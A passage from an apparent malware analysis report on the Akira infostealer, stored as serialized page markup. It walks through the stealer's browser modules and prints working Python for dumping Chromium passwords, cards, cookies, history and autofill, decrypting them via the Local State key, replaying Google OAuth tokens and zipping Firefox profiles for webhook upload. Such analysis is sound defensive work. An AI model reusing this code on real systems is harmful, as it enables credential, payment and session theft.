Uran",[2741,12254,12255,12258,12259,2772,12262,12273,12275,12276,12285,12287,12288,2289,12291,12294],{},[1736,12256,12257],{},"Firefox‑based"," (via ",[1524,12260,12261],{},"GeckoDriver",[2738,12263,12264,12267,12270],{},[2741,12265,12266],{},"Mozilla Firefox",[2741,12268,12269],{},"Waterfox",[2741,12271,12272],{},"Pale Moon",[2016,12274],{},"Akira dynamically locates user profiles using environment variables and well-known directory structures:",[1545,12277,12279],{"className":10501,"code":12278,"language":10503,"meta":863,"style":863},"user_path = os.path.join(os.getenv(\"LOCALAPPDATA\"), \"Google\", \"Chrome\", \"User Data\")\n",[1524,12280,12281],{"__ignoreMap":863},[1588,12282,12283],{"class":1590,"line":1591},[1588,12284,12278],{},[2016,12286],{},"It recursively checks for available browser profiles (e.g. ",[1524,12289,12290],{},"Default",[1524,12292,12293],{},"Profile 1",", etc.) and targets SQLite databases within those paths.",[1671,12296,12298],{"id":12297},"_741-data-types-extracted","7.4.1 Data Types Extracted",[806,12300,1677],{},[1902,12302,1905,12303],{"style":10692},[1923,12304,12305,1905,12318,1905,12331,1905,12343,1905,12355,1905,12367,1905,12378],{},[1911,12306,1909,12307,1909,12311,1909,12315,1905],{},[1915,12308,12310],{"style":12309},"text-align: left; width: 22%;","Data Type",[1915,12312,12314],{"style":12313},"text-align: left; width: 28%;","Source File",[1915,12316,12317],{"style":10861},"Notes",[1911,12319,1909,12320,1909,12323,1909,12328,1905],{},[1928,12321,12322],{},"Saved Passwords",[1928,12324,12325,12327],{},[1524,12326,6619],{}," (Chromium)",[1928,12329,12330],{},"Decrypted via DPAPI or AES-GCM (post Chromium v80)",[1911,12332,1909,12333,1909,12336,1909,12340,1905],{"style":10717},[1928,12334,12335],{},"Cookies",[1928,12337,12338],{},[1524,12339,12335],{},[1928,12341,12342],{},"Can include session tokens, especially for Google/Facebook accounts",[1911,12344,1909,12345,1909,12348,1909,12352,1905],{},[1928,12346,12347],{},"Autofill Data",[1928,12349,12350],{},[1524,12351,6622],{},[1928,12353,12354],{},"Addresses, emails, phone numbers, etc.",[1911,12356,1909,12357,1909,12360,1909,12364,1905],{"style":10717},[1928,12358,12359],{},"Credit Cards",[1928,12361,12362],{},[1524,12363,6622],{},[1928,12365,12366],{},"Encrypted; requires master key",[1911,12368,1909,12369,1909,12372,1909,12375,1905],{},[1928,12370,12371],{},"Session Tokens",[1928,12373,12374],{},"In-memory & cookies",[1928,12376,12377],{},"Includes Gmail, Google accounts, and Discord OAUTH replay",[1911,12379,1909,12380,1909,12383,1909,12391,1905],{"style":10717},[1928,12381,12382],{},"History & URLs",[1928,12384,12385,2289,12388],{},[1524,12386,12387],{},"History",[1524,12389,12390],{},"Visited Links",[1928,12392,12393],{},"Were also exfiltrated to the attacker",[1541,12395],{"className":12396},[6875,6876],[806,12398,12399,12402],{},[1736,12400,12401],{},"3. Extraction Modules","\nWhen malware authors target browsers, their primary treasure troves are the various SQLite databases where Chrome, Firefox, and their kin store credentials, cookies, history, and autofill entries. astor.py stitches together lightweight Python and native APIs to methodically pluck every piece of data—and even replay live OAuth sessions—without leaving a trace. Below is an in-depth, module-by-module tour, verbatim from the code.",[1671,12404,12406,12407,2772],{"id":12405},"_742-password-dumper-chromiumgetpasswords","7.4.2 Password Dumper (",[1524,12408,12409],{},"Chromium.GetPasswords",[806,12411,1677],{},[806,12413,12414],{},"This module systematically searches through all Chromium-based browser profiles to extract saved login credentials. By targeting the Login Data SQLite database, it retrieves usernames and encrypted passwords, then uses the platform’s encryption key (retrieved via DPAPI or AES-GCM) to decrypt them into cleartext. These credentials are highly valuable for post-compromise pivoting or account takeover.",[1545,12416,12418],{"className":10501,"code":12417,"language":10503,"meta":863,"style":863},"for root, _, files in os.walk(self.BrowserPath):\n for file in files:\n if file.lower() == \"login data\":\n # Copy DB → open → extract rows\n results = cursor.execute(\n \"SELECT origin_url, username_value, password_value FROM logins\"\n ).fetchall()\n for url, user, pwd_blob in results:\n clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n passwords.append((url, user, clear_pwd))\n",[1524,12419,12420,12425,12430,12435,12440,12445,12450,12455,12460,12465],{"__ignoreMap":863},[1588,12421,12422],{"class":1590,"line":1591},[1588,12423,12424],{},"for root, _, files in os.walk(self.BrowserPath):\n",[1588,12426,12427],{"class":1590,"line":864},[1588,12428,12429],{}," for file in files:\n",[1588,12431,12432],{"class":1590,"line":1814},[1588,12433,12434],{}," if file.lower() == \"login data\":\n",[1588,12436,12437],{"class":1590,"line":1831},[1588,12438,12439],{}," # Copy DB → open → extract rows\n",[1588,12441,12442],{"class":1590,"line":2135},[1588,12443,12444],{}," results = cursor.execute(\n",[1588,12446,12447],{"class":1590,"line":2141},[1588,12448,12449],{}," \"SELECT origin_url, username_value, password_value FROM logins\"\n",[1588,12451,12452],{"class":1590,"line":2147},[1588,12453,12454],{}," ).fetchall()\n",[1588,12456,12457],{"class":1590,"line":2153},[1588,12458,12459],{}," for url, user, pwd_blob in results:\n",[1588,12461,12462],{"class":1590,"line":2159},[1588,12463,12464],{}," clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n",[1588,12466,12467],{"class":1590,"line":2165},[1588,12468,12469],{}," passwords.append((url, user, clear_pwd))\n",[2738,12471,12472,12485,12491,12499,12516],{},[2741,12473,12474,12477,12478,12480,12481,12484],{},[1736,12475,12476],{},"Locates"," every ",[1524,12479,6619],{}," SQLite database under the browser’s ",[1524,12482,12483],{},"User Data"," folder.",[2741,12486,12487,12490],{},[1736,12488,12489],{},"Copies"," to a temp file to avoid browser locks.",[2741,12492,12493,2545,12496,2786],{},[1736,12494,12495],{},"SQL Query",[1524,12497,12498],{},"SELECT origin_url, username_value, password_value FROM logins",[2741,12500,12501,12504,12505,12508,12509,2789,12512,12515],{},[1736,12502,12503],{},"Decrypts"," each ",[1524,12506,12507],{},"password_value"," blob via AES‑GCM (",[1524,12510,12511],{},"v10",[1524,12513,12514],{},"v11",") or Windows DPAPI fallback.",[2741,12517,12518,12521,12522,2786],{},[1736,12519,12520],{},"Writes"," output to ",[1524,12523,12524],{},"Passwords/\u003CBrowserName> Passwords.txt",[1671,12526,12528,12529,2772],{"id":12527},"_743-credit-card-dumper-chromiumgetcreditcards","7.4.3 Credit Card Dumper (",[1524,12530,12531],{},"Chromium.GetCreditCards",[806,12533,1677],{},[806,12535,12536],{},"Here, the stealer accesses stored credit card data from each browser profile’s Web Data file. It focuses on extracting expiration details and encrypted credit card numbers, which are then decrypted with the same logic as passwords. Although CVV codes are typically not stored, the recovered information can still be misused for card-not-present fraud.",[1545,12538,12540],{"className":10501,"code":12539,"language":10503,"meta":863,"style":863},"results = cursor.execute(\n \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n).fetchall()\nfor month, year, enc_cc in results:\n cc_number = self.Decrypt(enc_cc, encryptionKey)\n ccs.append((cc_number, month, year))\n",[1524,12541,12542,12547,12552,12557,12562,12567],{"__ignoreMap":863},[1588,12543,12544],{"class":1590,"line":1591},[1588,12545,12546],{},"results = cursor.execute(\n",[1588,12548,12549],{"class":1590,"line":864},[1588,12550,12551],{}," \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n",[1588,12553,12554],{"class":1590,"line":1814},[1588,12555,12556],{},").fetchall()\n",[1588,12558,12559],{"class":1590,"line":1831},[1588,12560,12561],{},"for month, year, enc_cc in results:\n",[1588,12563,12564],{"class":1590,"line":2135},[1588,12565,12566],{}," cc_number = self.Decrypt(enc_cc, encryptionKey)\n",[1588,12568,12569],{"class":1590,"line":2141},[1588,12570,12571],{}," ccs.append((cc_number, month, year))\n",[2738,12573,12574,12583,12590,12598],{},[2741,12575,12576,12579,12580,12582],{},[1736,12577,12578],{},"Targets"," the ",[1524,12581,6622],{}," SQLite stores under each profile.",[2741,12584,12585,2545,12587,2786],{},[1736,12586,12495],{},[1524,12588,12589],{},"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards",[2741,12591,12592,2025,12594,12597],{},[1736,12593,12503],{},[1524,12595,12596],{},"card_number_encrypted"," exactly like the password blobs.",[2741,12599,12600,12603,12604,2786],{},[1736,12601,12602],{},"Outputs"," to ",[1524,12605,12606],{},"CreditCards/\u003CBrowserName> CreditCards.txt",[1671,12608,12610,12611,2772],{"id":12609},"_744-cookie-dumper-chromiumgetcookies","7.4.4 Cookie Dumper (",[1524,12612,12613],{},"Chromium.GetCookies",[806,12615,1677],{},[806,12617,12618],{},"Cookies, especially session cookies, are prime targets for account hijacking without passwords. This module dumps all cookie files across profiles, decrypts them, and collects essential metadata like domain, name, and expiration. Combined with fingerprinting, these cookies can enable seamless replay attacks on authenticated services.",[1545,12620,12622],{"className":10501,"code":12621,"language":10503,"meta":863,"style":863},"results = cursor.execute(\n \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n).fetchall()\nfor host, name, path, blob, expiry in results:\n cookie_val = self.Decrypt(blob, encryptionKey)\n cookies.append((host, name, path, cookie_val, expiry))\n",[1524,12623,12624,12628,12633,12637,12642,12647],{"__ignoreMap":863},[1588,12625,12626],{"class":1590,"line":1591},[1588,12627,12546],{},[1588,12629,12630],{"class":1590,"line":864},[1588,12631,12632],{}," \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n",[1588,12634,12635],{"class":1590,"line":1814},[1588,12636,12556],{},[1588,12638,12639],{"class":1590,"line":1831},[1588,12640,12641],{},"for host, name, path, blob, expiry in results:\n",[1588,12643,12644],{"class":1590,"line":2135},[1588,12645,12646],{}," cookie_val = self.Decrypt(blob, encryptionKey)\n",[1588,12648,12649],{"class":1590,"line":2141},[1588,12650,12651],{}," cookies.append((host, name, path, cookie_val, expiry))\n",[2738,12653,12654,12662,12670,12678],{},[2741,12655,12656,12477,12659,12661],{},[1736,12657,12658],{},"Scans",[1524,12660,12335],{}," SQLite database.",[2741,12663,12664,2025,12667,2786],{},[1736,12665,12666],{},"Selects",[1524,12668,12669],{},"host_key, name, path, encrypted_value, expires_utc",[2741,12671,12672,12504,12674,12677],{},[1736,12673,12503],{},[1524,12675,12676],{},"encrypted_value"," blob to reveal the actual cookie string.",[2741,12679,12680,12683,12684,2786],{},[1736,12681,12682],{},"Saves"," into ",[1524,12685,12686],{},"Cookies/\u003CBrowserName> Cookies.txt",[1671,12688,12690,12691,2772],{"id":12689},"_745-google-session-dumper-chromiumdump_google_sessions","7.4.5 Google Session Dumper (",[1524,12692,12693],{},"Chromium.dump_google_sessions",[806,12695,1677],{},[806,12697,12698],{},"One of the more advanced components, this routine decrypts stored OAuth tokens from the token_service table. By replaying them via Google’s multilogin endpoint, the malware can regenerate active session cookies—allowing attackers to hijack Google accounts without credentials. This illustrates how access tokens have become prime targets in modern stealers.",[1545,12700,12702],{"className":10501,"code":12701,"language":10503,"meta":863,"style":863},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\nfor service, blob in cursor.fetchall():\n iv = blob[3:15]\n ciphertext = blob[15:-16]\n cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n token = cipher.decrypt(ciphertext).decode()\n # Replays via POST to OAuth endpoint\n response = requests.post(\n \"https://accounts.google.com/oauth/multilogin\",\n headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n data={\"source\": \"com.google.Drive\"}\n )\n save each account’s cookies to file\n",[1524,12703,12704,12709,12714,12719,12724,12729,12734,12739,12744,12749,12754,12759,12763],{"__ignoreMap":863},[1588,12705,12706],{"class":1590,"line":1591},[1588,12707,12708],{},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\n",[1588,12710,12711],{"class":1590,"line":864},[1588,12712,12713],{},"for service, blob in cursor.fetchall():\n",[1588,12715,12716],{"class":1590,"line":1814},[1588,12717,12718],{}," iv = blob[3:15]\n",[1588,12720,12721],{"class":1590,"line":1831},[1588,12722,12723],{}," ciphertext = blob[15:-16]\n",[1588,12725,12726],{"class":1590,"line":2135},[1588,12727,12728],{}," cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n",[1588,12730,12731],{"class":1590,"line":2141},[1588,12732,12733],{}," token = cipher.decrypt(ciphertext).decode()\n",[1588,12735,12736],{"class":1590,"line":2147},[1588,12737,12738],{}," # Replays via POST to OAuth endpoint\n",[1588,12740,12741],{"class":1590,"line":2153},[1588,12742,12743],{}," response = requests.post(\n",[1588,12745,12746],{"class":1590,"line":2159},[1588,12747,12748],{}," \"https://accounts.google.com/oauth/multilogin\",\n",[1588,12750,12751],{"class":1590,"line":2165},[1588,12752,12753],{}," headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n",[1588,12755,12756],{"class":1590,"line":11039},[1588,12757,12758],{}," data={\"source\": \"com.google.Drive\"}\n",[1588,12760,12761],{"class":1590,"line":11045},[1588,12762,11970],{},[1588,12764,12765],{"class":1590,"line":11051},[1588,12766,12767],{}," save each account’s cookies to file\n",[2738,12769,12770,12786,12796,12806],{},[2741,12771,12772,2025,12775,12778,12779,12782,12783,12785],{},[1736,12773,12774],{},"Fetches",[1524,12776,12777],{},"service"," and raw ",[1524,12780,12781],{},"encrypted_token"," from ",[1524,12784,6622],{}," clone.",[2741,12787,12788,12791,12792,12795],{},[1736,12789,12790],{},"AES‑GCM decryption"," using the browser’s ",[1524,12793,12794],{},"Local State"," key.",[2741,12797,12798,12801,12802,12805],{},[1736,12799,12800],{},"Replays"," decrypted tokens in a POST to Google’s ",[1524,12803,12804],{},"multilogin"," API to reconstruct valid OAuth cookies.",[2741,12807,12808,12810,12811,2786],{},[1736,12809,12520],{}," per-account session files under ",[1524,12812,12813],{},"Cookies/\u003Cdisplay_email> Google Session.txt",[1671,12815,12817,12818,2772],{"id":12816},"_746-history-dumper-chromiumgethistory","7.4.6 History Dumper (",[1524,12819,12820],{},"Chromium.GetHistory",[806,12822,1677],{},[806,12824,12825],{},"This function extracts browsing history entries including URL, title, and visit frequency. Beyond privacy invasion, this data helps attackers understand victim behavior, identify high-value targets (e.g., banking portals), or tailor social engineering payloads.",[1545,12827,12829],{"className":10501,"code":12828,"language":10503,"meta":863,"style":863},"results = cursor.execute(\n \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n).fetchall()\nhistory.sort(key=lambda x: x[3], reverse=True)\nreturn [(url, title, count) for url, title, count, _ in history]\n",[1524,12830,12831,12835,12840,12844,12849],{"__ignoreMap":863},[1588,12832,12833],{"class":1590,"line":1591},[1588,12834,12546],{},[1588,12836,12837],{"class":1590,"line":864},[1588,12838,12839],{}," \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n",[1588,12841,12842],{"class":1590,"line":1814},[1588,12843,12556],{},[1588,12845,12846],{"class":1590,"line":1831},[1588,12847,12848],{},"history.sort(key=lambda x: x[3], reverse=True)\n",[1588,12850,12851],{"class":1590,"line":2135},[1588,12852,12853],{},"return [(url, title, count) for url, title, count, _ in history]\n",[2738,12855,12856,12867,12877],{},[2741,12857,12858,2025,12860,12863,12864,12866],{},[1736,12859,12666],{},[1524,12861,12862],{},"url, title, visit_count, last_visit_time"," from every ",[1524,12865,12387],{}," DB.",[2741,12868,12869,12872,12873,12876],{},[1736,12870,12871],{},"Sorts"," entries by ",[1524,12874,12875],{},"last_visit_time"," descending.",[2741,12878,12879,2025,12881,2786],{},[1736,12880,12602],{},[1524,12882,12883],{},"History/\u003CBrowserName> History.txt",[1671,12885,12887,12888,2772],{"id":12886},"_747-autofill-dumper-chromiumgetautofills","7.4.7 Autofill Dumper (",[1524,12889,12890],{},"Chromium.GetAutofills",[806,12892,1677],{},[806,12894,12895],{},"Autofill entries—like addresses, names, emails, and sometimes payment-related data—are scraped from the browser’s Web Data storage. These values may not seem critical, but when aggregated, they offer a rich profile of the victim’s identity and behavior.",[1545,12897,12899],{"className":10501,"code":12898,"language":10503,"meta":863,"style":863},"results = cursor.execute(\n \"SELECT name, value FROM autofill\"\n).fetchall()\nfor field, value in results:\n autofills.append((field.strip(), value.strip()))\n",[1524,12900,12901,12905,12910,12914,12919],{"__ignoreMap":863},[1588,12902,12903],{"class":1590,"line":1591},[1588,12904,12546],{},[1588,12906,12907],{"class":1590,"line":864},[1588,12908,12909],{}," \"SELECT name, value FROM autofill\"\n",[1588,12911,12912],{"class":1590,"line":1814},[1588,12913,12556],{},[1588,12915,12916],{"class":1590,"line":1831},[1588,12917,12918],{},"for field, value in results:\n",[1588,12920,12921],{"class":1590,"line":2135},[1588,12922,12923],{}," autofills.append((field.strip(), value.strip()))\n",[2738,12925,12926,12939],{},[2741,12927,12928,12930,12931,12934,12935,12938],{},[1736,12929,12774],{}," form-fill entries: ",[1524,12932,12933],{},"name, value"," from the ",[1524,12936,12937],{},"web data"," file.",[2741,12940,12941,12943,12944,2786],{},[1736,12942,12520],{}," out as ",[1524,12945,12946],{},"Autofill/\u003CBrowserName> Autofill.txt",[1671,12948,12950,12951,12953,12954,2772],{"id":12949},"_748-firefox-profile-grabber-geckodriver-grabfirefoxprofiles","7.4.8 Firefox Profile Grabber (",[1524,12952,12261],{}," & ",[1524,12955,12956],{},"grabFirefoxProfiles",[806,12958,1677],{},[806,12960,12961],{},"Unlike the granular Chromium routines, this function opts for a broad approach: it compresses the entire Firefox profile directory—including saved logins, cookies, and bookmarks—and exfiltrates it wholesale. This ensures attackers can analyze or extract data offline, bypassing decryption hurdles with known NSS tooling.",[1545,12963,12965],{"className":10501,"code":12964,"language":10503,"meta":863,"style":863},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n for root, dirs, files in os.walk(source_path):\n zipf.write(each file)\n# Upload via GoFile/File.io, then POST via attacker webhooks\n",[1524,12966,12967,12972,12977,12982],{"__ignoreMap":863},[1588,12968,12969],{"class":1590,"line":1591},[1588,12970,12971],{},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n",[1588,12973,12974],{"class":1590,"line":864},[1588,12975,12976],{}," for root, dirs, files in os.walk(source_path):\n",[1588,12978,12979],{"class":1590,"line":1814},[1588,12980,12981],{}," zipf.write(each file)\n",[1588,12983,12984],{"class":1590,"line":1831},[1588,12985,12986],{},"# Upload via GoFile/File.io, then POST via attacker webhooks\n",[2738,12988,12989,12999,13009],{},[2741,12990,12991,12994,12995,12998],{},[1736,12992,12993],{},"Zips"," the entire ",[1524,12996,12997],{},"%APPDATA%\\Mozilla\\Firefox\\Profiles"," directory.",[2741,13000,13001,13004,13005,13008],{},[1736,13002,13003],{},"Names"," it ",[1524,13006,13007],{},"%TEMP%\\\u003CComputerName>_Firefox_profiles.zip"," and sends the download link over the same webhook channels.",[2741,13010,13011,13014,13015,2289,13018,2289,13021,13024],{},[1736,13012,13013],{},"Also"," invokes the same SQLite-based extraction functions (",[1524,13016,13017],{},"logins.json",[1524,13019,13020],{},"cookies.sqlite",[1524,13022,13023],{},"places.sqlite",") against each Firefox profile using the NSS decryption routines already present.",[1671,13026,13028],{"id":13027},"_749-extraction-summary","7.4.9 Extraction Summary",[806,13030,1677],{},[806,13032,13033,13034,2289,13036,2289,13038,2289,13040,8210,13042,13045,13046,13049,13050,13052,13053,2289,13055,8210,13057,13059,13060,13063],{},"Astor.py orchestrates a comprehensive browser compromise by systematically harvesting every credential and session artifact across Chromium-based and Firefox clients. It locates and safely copies each SQLite store—",[1524,13035,6619],{},[1524,13037,6622],{},[1524,13039,12335],{},[1524,13041,12387],{},[1524,13043,13044],{},"autofill","—then runs targeted SQL queries to extract URLs, usernames, passwords, credit-card details, cookies, browsing history, and form-fill entries. Passwords and payment data are decrypted via AES-GCM (or Windows DPAPI fallback), while cookies are similarly unwrapped to reveal their plaintext values. For Google accounts, encrypted OAuth tokens from ",[1524,13047,13048],{},"token_service"," are decrypted and replayed against the ",[1524,13051,12804],{}," API to regenerate live session cookies. Finally, Firefox profiles are archived wholesale (including ",[1524,13054,13017],{},[1524,13056,13020],{},[1524,13058,13023],{},") and delivered as ZIPs, ensuring no artifact is left behind. This end-to-end pipeline runs silently under ",[1524,13061,13062],{},"%TEMP%\\\u003CComputerName>",", producing neatly organized output files for every data category.",[810,13065,13067],{"id":13066},"_75-decryption-logic","7.5 Decryption Logic",[806,13069,1536],{},[806,13071,13072],{},"Modern browsers like Chrome and Edge encrypt sensitive data—such as passwords, cookies, and credit card details—before storing them locally. Akira includes built-in decryption routines tailored to handle both legacy and current Chromium encryption methods. This ensures it can extract cleartext data regardless of the system's patch level or browser version.",[806,13074,13075],{},"At the core of this process is the extraction and decryption of the browser’s master encryption key, stored in a file called Local State. Depending on the browser version and Windows build, Akira dynamically selects the appropriate decryption method:",[806,13077,13078],{},"DPAPI (Data Protection API) is used on older systems, where Chrome stores secrets protected by the current user's Windows credentials.",[806,13080,13081],{},"AES-GCM is used on modern Chromium builds, where a randomly generated master key is itself encrypted with DPAPI, then used for in-app encryption of user data.",[806,13083,13084],{},"By first decrypting the Local State master key, Akira gains the ability to unlock all browser secrets—paving the way for extracting credentials, tokens, cookies, and more.",[806,13086,13087],{},[1736,13088,13089],{},"Key extraction",[1545,13091,13093],{"className":10501,"code":13092,"language":10503,"meta":863,"style":863},"local_state_path = os.path.join(user_path, \"Local State\")\nwith open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n local_state = json.load(f)\nmaster_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[1524,13094,13095,13100,13105,13110],{"__ignoreMap":863},[1588,13096,13097],{"class":1590,"line":1591},[1588,13098,13099],{},"local_state_path = os.path.join(user_path, \"Local State\")\n",[1588,13101,13102],{"class":1590,"line":864},[1588,13103,13104],{},"with open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n",[1588,13106,13107],{"class":1590,"line":1814},[1588,13108,13109],{}," local_state = json.load(f)\n",[1588,13111,13112],{"class":1590,"line":1831},[1588,13113,13114],{},"master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[806,13116,13117],{},[1736,13118,13119],{},"Decryption (AES-GCM):",[1545,13121,13123],{"className":10501,"code":13122,"language":10503,"meta":863,"style":863},"nonce = value[3:15]\nciphertext = value[15:-16]\ntag = value[-16:]\ncipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\ndecrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[1524,13124,13125,13130,13135,13140,13145],{"__ignoreMap":863},[1588,13126,13127],{"class":1590,"line":1591},[1588,13128,13129],{},"nonce = value[3:15]\n",[1588,13131,13132],{"class":1590,"line":864},[1588,13133,13134],{},"ciphertext = value[15:-16]\n",[1588,13136,13137],{"class":1590,"line":1814},[1588,13138,13139],{},"tag = value[-16:]\n",[1588,13141,13142],{"class":1590,"line":1831},[1588,13143,13144],{},"cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\n",[1588,13146,13147],{"class":1590,"line":2135},[1588,13148,13149],{},"decrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[806,13151,13152,13153,2786],{},"If fallback to DPAPI is needed (on older systems), it uses ",[1524,13154,13155],{},"win32crypt.CryptUnprotectData()",[806,13157,13158,13164],{},[1736,13159,13160,13161,3034],{},"Explanation of ",[1524,13162,13163],{},"decrypt_password_blob","\nThis function demonstrates how Akira Stealer decrypts each saved password value from Chromium-based browsers. It handles two cases:",[4351,13166,13167,13177],{},[2741,13168,13169,13172,13173,13176],{},[1736,13170,13171],{},"Windows DPAPI blobs"," (older or non-GCM encrypted data): Falls back to the system call ",[1524,13174,13175],{},"CryptUnprotectData",", which uses the user’s Windows credentials to decrypt.",[2741,13178,13179,13182,13183,13186],{},[1736,13180,13181],{},"AES-GCM encrypted blobs"," (Chrome v10/v11 format): Parses the version header, extracts the IV and authentication tag, and uses the ",[1524,13184,13185],{},"cryptography"," library to decrypt the payload securely.",[1545,13188,13190],{"className":10501,"code":13189,"language":10503,"meta":863,"style":863},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n \"\"\"\n Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n\n Parameters:\n - buffer: raw encrypted blob from the `password_value` field\n - key: the master AES key retrieved via DPAPI from Local State\n\n Returns:\n - Decrypted UTF-8 plaintext password\n \"\"\"\n # 1) DPAPI fallback for non-AES-GCM blobs\n if not buffer.startswith((b'v10', b'v11')):\n # Uses Windows CryptUnprotectData under the hood\n return CryptUnprotectData(buffer)\n\n # 2) AES-GCM decryption for Chrome v10/v11 format:\n # Bytes layout:\n # [0:3] = version header ('v10'/'v11')\n # [3:15] = initialization vector (IV)\n # [15:-16] = ciphertext payload\n # [-16:] = GCM authentication tag\n iv = buffer[3:15]\n ciphertext = buffer[15:-16]\n tag = buffer[-16:]\n\n # Initialize AES-GCM cipher with extracted IV and tag\n cipher = Cipher(\n algorithms.AES(key),\n modes.GCM(iv, tag),\n backend=default_backend()\n )\n decryptor = cipher.decryptor()\n\n # Perform decryption; raises if authentication fails\n plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n\n # Decode to UTF-8, ignoring any stray errors\n return plaintext.decode('utf-8', errors='ignore')\n",[1524,13191,13192,13197,13202,13206,13210,13215,13219,13224,13228,13233,13238,13243,13247,13252,13257,13261,13266,13271,13276,13281,13285,13290,13295,13300,13305,13310,13315,13320,13325,13330,13334,13339,13344,13349,13354,13359,13363,13368,13372,13377,13382,13386,13391],{"__ignoreMap":863},[1588,13193,13194],{"class":1590,"line":1591},[1588,13195,13196],{},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n",[1588,13198,13199],{"class":1590,"line":864},[1588,13200,13201],{},"from cryptography.hazmat.backends import default_backend\n",[1588,13203,13204],{"class":1590,"line":1814},[1588,13205,9865],{"emptyLinePlaceholder":508},[1588,13207,13208],{"class":1590,"line":1831},[1588,13209,9865],{"emptyLinePlaceholder":508},[1588,13211,13212],{"class":1590,"line":2135},[1588,13213,13214],{},"def decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n",[1588,13216,13217],{"class":1590,"line":2141},[1588,13218,11844],{},[1588,13220,13221],{"class":1590,"line":2147},[1588,13222,13223],{}," Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n",[1588,13225,13226],{"class":1590,"line":2153},[1588,13227,9865],{"emptyLinePlaceholder":508},[1588,13229,13230],{"class":1590,"line":2159},[1588,13231,13232],{}," Parameters:\n",[1588,13234,13235],{"class":1590,"line":2165},[1588,13236,13237],{}," - buffer: raw encrypted blob from the `password_value` field\n",[1588,13239,13240],{"class":1590,"line":11039},[1588,13241,13242],{}," - key: the master AES key retrieved via DPAPI from Local State\n",[1588,13244,13245],{"class":1590,"line":11045},[1588,13246,9865],{"emptyLinePlaceholder":508},[1588,13248,13249],{"class":1590,"line":11051},[1588,13250,13251],{}," Returns:\n",[1588,13253,13254],{"class":1590,"line":11057},[1588,13255,13256],{}," - Decrypted UTF-8 plaintext password\n",[1588,13258,13259],{"class":1590,"line":11063},[1588,13260,11844],{},[1588,13262,13263],{"class":1590,"line":11069},[1588,13264,13265],{}," # 1) DPAPI fallback for non-AES-GCM blobs\n",[1588,13267,13268],{"class":1590,"line":11075},[1588,13269,13270],{}," if not buffer.startswith((b'v10', b'v11')):\n",[1588,13272,13273],{"class":1590,"line":11081},[1588,13274,13275],{}," # Uses Windows CryptUnprotectData under the hood\n",[1588,13277,13278],{"class":1590,"line":11087},[1588,13279,13280],{}," return CryptUnprotectData(buffer)\n",[1588,13282,13283],{"class":1590,"line":11093},[1588,13284,9865],{"emptyLinePlaceholder":508},[1588,13286,13287],{"class":1590,"line":11099},[1588,13288,13289],{}," # 2) AES-GCM decryption for Chrome v10/v11 format:\n",[1588,13291,13292],{"class":1590,"line":11105},[1588,13293,13294],{}," # Bytes layout:\n",[1588,13296,13297],{"class":1590,"line":11111},[1588,13298,13299],{}," # [0:3] = version header ('v10'/'v11')\n",[1588,13301,13302],{"class":1590,"line":11117},[1588,13303,13304],{}," # [3:15] = initialization vector (IV)\n",[1588,13306,13307],{"class":1590,"line":11123},[1588,13308,13309],{}," # [15:-16] = ciphertext payload\n",[1588,13311,13312],{"class":1590,"line":11790},[1588,13313,13314],{}," # [-16:] = GCM authentication tag\n",[1588,13316,13317],{"class":1590,"line":11795},[1588,13318,13319],{}," iv = buffer[3:15]\n",[1588,13321,13322],{"class":1590,"line":11800},[1588,13323,13324],{}," ciphertext = buffer[15:-16]\n",[1588,13326,13327],{"class":1590,"line":11805},[1588,13328,13329],{}," tag = buffer[-16:]\n",[1588,13331,13332],{"class":1590,"line":11811},[1588,13333,9865],{"emptyLinePlaceholder":508},[1588,13335,13336],{"class":1590,"line":11816},[1588,13337,13338],{}," # Initialize AES-GCM cipher with extracted IV and tag\n",[1588,13340,13341],{"class":1590,"line":11821},[1588,13342,13343],{}," cipher = Cipher(\n",[1588,13345,13346],{"class":1590,"line":11826},[1588,13347,13348],{}," algorithms.AES(key),\n",[1588,13350,13351],{"class":1590,"line":11831},[1588,13352,13353],{}," modes.GCM(iv, tag),\n",[1588,13355,13356],{"class":1590,"line":11836},[1588,13357,13358],{}," backend=default_backend()\n",[1588,13360,13361],{"class":1590,"line":11841},[1588,13362,11970],{},[1588,13364,13365],{"class":1590,"line":11847},[1588,13366,13367],{}," decryptor = cipher.decryptor()\n",[1588,13369,13370],{"class":1590,"line":11853},[1588,13371,9865],{"emptyLinePlaceholder":508},[1588,13373,13374],{"class":1590,"line":11859},[1588,13375,13376],{}," # Perform decryption; raises if authentication fails\n",[1588,13378,13379],{"class":1590,"line":11864},[1588,13380,13381],{}," plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n",[1588,13383,13384],{"class":1590,"line":11869},[1588,13385,9865],{"emptyLinePlaceholder":508},[1588,13387,13388],{"class":1590,"line":11874},[1588,13389,13390],{}," # Decode to 